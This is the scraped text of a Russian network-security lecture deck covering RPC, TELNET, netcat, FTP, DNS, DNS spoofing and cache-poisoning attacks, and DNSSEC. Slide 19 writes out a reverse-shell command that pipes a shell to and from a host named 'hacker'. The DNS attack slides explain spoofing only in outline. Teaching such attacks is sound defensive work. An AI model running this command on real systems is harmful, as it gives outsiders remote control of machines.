Презентация "Прикладной уровень. DNS - 2" - скачать презентации по Информатике

Содержание

Слайд 2

Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня

Клиент

Сервер

Протокол обмена

TELNET
FTP
HTTP

Реализация служб прикладного уровня

Слайд 3

Удалённый вызов процедур Канальный уровень Физический уровень Сетевой уровень Транспортный уровень

Удалённый вызов процедур

Канальный
уровень

Физический
уровень

Сетевой
уровень

Транспортный
уровень

Уровень
соединения

Уровень
представления

Уровень
приложения

7

6

5

4

3

2

1

Ethernet, FDDI, X.25
и другие

Сетевой
уровень

IP

TCP,

UDP

RPC

У Ч Е Б Н Ы Й Ц Е Н Т Р
ИНФОРМЗАЩИТА

Слайд 4

Клиент Сервер RPC Протокол RPC Спецификация RPC-сервера Номер программы Номер процедуры Номер версии

Клиент

Сервер RPC

Протокол RPC

Спецификация RPC-сервера

Номер программы
Номер процедуры
Номер версии

Слайд 5

Клиент Сервер RPC Запрос клиента Спецификация RPC-сервера Номер программы Номер процедуры Номер версии Номер порта

Клиент

Сервер RPC

Запрос клиента

Спецификация RPC-сервера

Номер программы
Номер процедуры
Номер версии

Номер порта

Слайд 6

Клиент Сервер RPC Номер процедуры RPC-сканирование Номер порта

Клиент

Сервер RPC

Номер процедуры

RPC-сканирование

Номер порта

Слайд 7

Клиент (утилита telnet) Сервер (telnetd) Протокол обмена TELNET Протокол удалённого терминала - TELNET

Клиент
(утилита telnet)

Сервер
(telnetd)

Протокол обмена

TELNET

Протокол удалённого терминала - TELNET

Слайд 8

Варианты взаимодействия по протоколу TELNET Терминал – Серверный процесс Терминал – Терминал Процесс – Процесс

Варианты взаимодействия
по протоколу TELNET

Терминал – Серверный процесс

Терминал – Терминал

Процесс – Процесс

Слайд 9

Взаимодействие «терминал-удалённый процесс» Терминал – Серверный процесс $a a a a

Взаимодействие
«терминал-удалённый процесс»

Терминал – Серверный процесс

$a

a

a

a

Слайд 10

Команды протокола TELNET Управляющий символ IAC Команда Параметры Interpret as Command,

Команды протокола TELNET

Управляющий символ IAC

Команда

Параметры

Interpret as Command, равен 255

Например, клавиша Backspace,

247

1 байт

1 байт

1 байт

Слайд 11

Команды протокола TELNET Название команды Код Описание команды IP (Interrupt Process)

Команды протокола TELNET

Название команды

Код

Описание команды

IP (Interrupt Process)

244

Прерывание процесса
пользователя

AO (Abort Output)


245

Остановка вывода
на дисплей

AYT (Are You There)

246

Проверка состояния системы

EC (Erase Character)

247

Удаление последнего введённого символа

EL (Erase Line)

248

Удаление текущей строки

Слайд 12

Передача команд $a IAC EC Backspace $

Передача команд

$a

IAC EC

Backspace

$

Слайд 13

Клиент (утилита telnet) Сервер (telnetd) Передача имени и пароля в открытом виде Уязвимости протокола TELNET

Клиент
(утилита telnet)

Сервер
(telnetd)

Передача имени и пароля в открытом виде

Уязвимости протокола TELNET

Слайд 14

Изменение переменных окружения до аутентификации Уязвимости протокола TELNET Клиент (утилита telnet) Сервер (telnetd)

Изменение переменных окружения до аутентификации

Уязвимости протокола TELNET

Клиент
(утилита telnet)

Сервер
(telnetd)

Слайд 15

Что такое Netcat? Netcat - это утилита, которая позволяет читать и

Что такое Netcat?

Netcat - это утилита, которая позволяет читать и записывать

данные по сети с использованием протоколов TCP или UDP. Возможности netcat :
Работа с входящими и исходящими TCP или UDP соединениями, использующими любые порты
Выполнение DNS запросов различных типов
Возможность задания порта источника
Возможность использования любого адреса источника (из локально сконфигурированных)
Возможности по сканированию портов
Работа в качестве telnet-сервера
Слайд 16

Netcat и Telnet Telnet имеет ограничения, преодолеть которые поможет Netcat. Например:

Netcat и Telnet

Telnet имеет ограничения, преодолеть которые поможет Netcat. Например:
Ограничения стандартного

потока ввода
Посылка сообщений об ошибках в стандартный поток вывода, вместе с данными
Невозможность посылки двоичных данных
Невозможность находиться в состоянии ожидания соединения
Невозможность работы с UDP
Слайд 17

Режимы работы Netcat Режим исходящих соединений Режим ожидания входящих соединений Слушающий

Режимы работы Netcat

Режим исходящих соединений

Режим ожидания входящих соединений

Слушающий порт

nc [-опции] <узел>

порт[ы]

nc –l –p <слушающий порт> [-опции] [узел] [порт]

Слайд 18

«Обращённый» TELNET

«Обращённый» TELNET

Слайд 19

«Обращённый» TELNET 80 25 > telnet hacker 80 | /bin/bash |

«Обращённый» TELNET

80

25

> telnet hacker 80

| /bin/bash | telnet hacker 25

/bin/bash

Команды

Результаты

Слайд 20

Клиент Сервер Команды Ответы Реализация службы FTP Интерфейс пользователя Модуль управления

Клиент

Сервер

Команды

Ответы

Реализация службы FTP

Интерфейс
пользователя

Модуль
управления
передачей

Модуль
передачи
данных

Данные

Модуль
управления
передачей

Модуль
передачи
данных

Слайд 21

telnet www.microsoft.com Resolver www.microsoft.com - ? 100.0.0.6 DNS Server DNS - служба

telnet www.microsoft.com

Resolver

www.microsoft.com - ?

100.0.0.6

DNS Server

DNS - служба

Слайд 22

Домены и поддомены « » org edu com company sale buhg

Домены и поддомены

« »

org

edu

com

company

sale

buhg

Root
Name
Server

company.com
Name Server

sale.company.com
Name Server

Слайд 23

Записи Resource Record main.sale.company.com. IN A 100.0.0.120 sale sale.company.com Name Server sale.company.com. IN NS ns.sale.company.com

Записи Resource Record

main.sale.company.com. IN A 100.0.0.120

sale

sale.company.com
Name Server

sale.company.com. IN NS ns.sale.company.com

Слайд 24

Разрешение имён R e s o l v e r main.sale.company.com

Разрешение имён

R
e
s
o
l
v
e
r

main.sale.company.com - ?

main.sale.company.com - ?

main.sale.company.com - ?

main.sale.company.com - ?

com Name

Server

Root Server

company.com NS

sale.company.com NS

Слайд 25

Применение транспортного протокола без установления соединения (UDP) Отсутствие идентификации и аутентификации

Применение транспортного протокола
без установления соединения (UDP)

Отсутствие идентификации и аутентификации

Отсутствие средств

разграничения доступа

Уязвимости службы DNS

Слайд 26

Пример атаки на IP - сеть: Атака на DNS Нарушение нормального

Пример атаки на IP - сеть:
Атака на DNS

Нарушение нормального функционирования

объекта атаки

Местонахождение атакующего

В одном сегменте с объектом атаки

Используемые уязвимости

Цель

Слабая защищённость протокола DNS -
- недостаток проектирования

Степень риска

Высокая

Нарушение навигации (ложный маршрут)

Механизм реализации

Слайд 27

Схема работы DNS - протокола DNS-сервер Хост А IP - адрес

Схема работы DNS - протокола

DNS-сервер

Хост А

IP - адрес

ID

Имя компьютера

SourcePort

DNS-запрос

DNS-ответ

ID

- генерируется приложением, пославшим запрос,
обычно=1

SourcePort вначале принимает значение 1024
а потом увеличивается

Пример атаки на IP - сеть:
Атака на DNS

Слайд 28

DNS-сервер Хост А ID Имя компьютера SourcePort DNS-запрос Хост А посылает

DNS-сервер

Хост А

ID

Имя компьютера

SourcePort

DNS-запрос

Хост А посылает DNS - запрос

Нарушитель должен находиться

в одной
подсети с А или в одной подсети с
DNS - сервером

Это позволит ему перехватить пакет
с запросом

Пример атаки на IP - сеть:
Атака на DNS

Слайд 29

DNS-сервер Хост А DNS-запрос Нарушитель извлекает из запроса ID и SourcePort

DNS-сервер

Хост А

DNS-запрос

Нарушитель извлекает из запроса ID и SourcePort

Ложный DNS - ответ:
от

имени настоящего DNS - сервера,
но в качестве IP - адреса искомого узла
указывается IP - адрес нарушителя

Результат: хост А имеет неправильное соответствие
между именем компьютера и IP - адресом

Пример атаки на IP - сеть:
Атака на DNS

Слайд 30

Хост А Узел сети Теперь путь пакета от хоста А до

Хост А

Узел сети

Теперь путь пакета от хоста А до узла сети
будет

лежать через хост нарушителя

Пример атаки на IP - сеть:
Атака на DNS

Слайд 31

Пример атаки на IP - сеть: Атака на DNS (вариант 2)

Пример атаки на IP - сеть:
Атака на DNS (вариант 2)

Нарушение

нормального функционирования объекта атаки

Местонахождение атакующего

В разных сегментах с объектом атаки

Используемые уязвимости

Цель

Слабая защищённость протокола DNS -
- недостаток проектирования

Степень риска

Высокая

Нарушение навигации (ложный маршрут)

Механизм реализации

Слайд 32

DNS-сервер Хост А ID IP - адрес DestPort Ложные DNS -

DNS-сервер

Хост А

ID

IP - адрес

DestPort

Ложные DNS - ответы

Перебор

Пример атаки на IP

- сеть:
Атака на DNS (вариант 2)
Слайд 33

DNS-сервер Хост А Ложные DNS - ответы Пример атаки на IP

DNS-сервер

Хост А

Ложные DNS - ответы

Пример атаки на IP - сеть:
Атака

на DNS (вариант 2)
Слайд 34

Хост А Узел сети Теперь путь пакета от хоста А до

Хост А

Узел сети

Теперь путь пакета от хоста А до узла сети
будет

лежать через хост нарушителя

Пример атаки на IP - сеть:
Атака на DNS (вариант 2)

Слайд 35

DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица DNS-сервер следующего уровня

DNS-сервер

193.233.70.129 ertr.mpei.ac.ru
.
.

Кэш - таблица

DNS-сервер
следующего уровня

DNS-запрос

DNS-ответ

194.154.77.109 www.infosec.ru

Пример атаки на IP - сеть:


Атака на DNS (вариант 3)
Слайд 36

DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица DNS-сервер следующего уровня

DNS-сервер

193.233.70.129 ertr.mpei.ac.ru
.
.

Кэш - таблица

DNS-сервер
следующего уровня

DNS-запрос

194.154.77.123 www.infosec.ru

Ложные DNS - ответы

Пример атаки на

IP - сеть:
Атака на DNS (вариант 3)
Слайд 37

DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица 194.154.77.123 www.infosec.ru Хост

DNS-сервер

193.233.70.129 ertr.mpei.ac.ru
.
.

Кэш - таблица

194.154.77.123 www.infosec.ru

Хост А

194.154.77.123

www.infosec.ru

DNS-запрос

DNS-ответ

Пример атаки на IP - сеть:


Атака на DNS (вариант 3)
Слайд 38

DNS в корпоративной сети Внешний узел Вторичный сервер Внутренний узел Первичный

DNS в корпоративной сети

Внешний узел

Вторичный
сервер

Внутренний
узел

Первичный
сервер

Репликация

Рекурсивный запрос

Рекурсивные
запросы

Итеративные
запросы

DNS

DNS

Слайд 39

DNS в корпоративной сети Доступ узлов корпоративной сети к полной информации

DNS в корпоративной сети

Доступ узлов корпоративной сети к полной
информации о

внутренних именах

Доступ отдельных узлов корпоративной сети
к глобальному пространству имён Internet

Доступ внешних узлов к минимально необходимой
информации о внутренних именах

Слайд 40

Двухсерверная конфигурация Внешний узел Вторичный сервер Внутренний узел Первичный сервер (минимальная

Двухсерверная конфигурация

Внешний узел

Вторичный
сервер

Внутренний
узел

Первичный
сервер
(минимальная
версия)

Репликация

Рекурсивный запрос

Рекурсивный
запрос

Итеративные
запросы

Межсетевой
экран

Первичный
сервер
(полная
версия)

DNS

DNS

DNS

Слайд 41

Трехсерверная конфигурация Внешний узел Вторичный сервер (минимальная версия) Внутренний узел (с

Трехсерверная конфигурация

Внешний узел

Вторичный
сервер
(минимальная версия)

Внутренний
узел (с Internet)

Первичный
сервер
(минимальная
версия)

Репликация

Рекурсивный запрос

Рекурсивный
запрос

Итеративные
запросы

Межсетевой
экран

Первичный
сервер
(полная
версия+корень)

DNS

DNS

DNS

DNS

Вторичный
сервер
(полная
версия)

Внутренний
узел

(без Internet)
Слайд 42

Трёхсерверная конфигурация Первичный сервер (минимальная версия) Межсетевой экран Первичный сервер (полная

Трёхсерверная конфигурация

Первичный
сервер
(минимальная
версия)

Межсетевой
экран

Первичный
сервер
(полная
версия)
+корень

DNS

DNS

DNS

Вторичный
сервер
(полная
версия)

Internet

Слайд 43

Протокол DNSSec Механизм распределения открытых ключей Целостность и аутентичность информации DNS Аутентификация транзакции

Протокол DNSSec

Механизм распределения открытых ключей

Целостность и аутентичность информации DNS

Аутентификация транзакции

Слайд 44

Новые записи Resource Record main.sale.company.com. IN A 100.0.0.120 sale.company.com. IN NS

Новые записи Resource Record

main.sale.company.com. IN A 100.0.0.120

sale.company.com. IN NS ns.sale.company.com

sale.company.com. IN

KEY [ключ]

sale.company.com. IN SIG [подпись]

sale.company.com. IN NXT [домен]

Слайд 45

Обычный DNS-запрос qname=main.sale.company.com qtype=A main.sale.company.com A 100.0.0.120 Владелец sale.company.com NS ns.sale.company.com

Обычный DNS-запрос

qname=main.sale.company.com
qtype=A

main.sale.company.com A 100.0.0.120
Владелец
sale.company.com NS ns.sale.company.com
Дополнительно
ns.sale.company.com A 100.0.1.130

Запрос

Ответ

Слайд 46

Запрос DNSSec qname=main.sale.company.com qtype=A Вопрос main.sale.company.com A ? main.sale.company.com A 100.0.0.120

Запрос DNSSec

qname=main.sale.company.com
qtype=A

Вопрос
main.sale.company.com A ?
main.sale.company.com A 100.0.0.120
main.sale.company.com SIG [подпись]
Владелец
sale.company.com NS ns.sale.company.com
sale.company.com SIG

[подпись]
Дополнительно
ns.sale.company.com A 100.0.1.130
ns.sale.company.com SIG [подпись]
sale.company.com KEY [ключ]
main.sale.company.com KEY [ключ]
ns.sale.company.com KEY [ключ]

Запрос

Ответ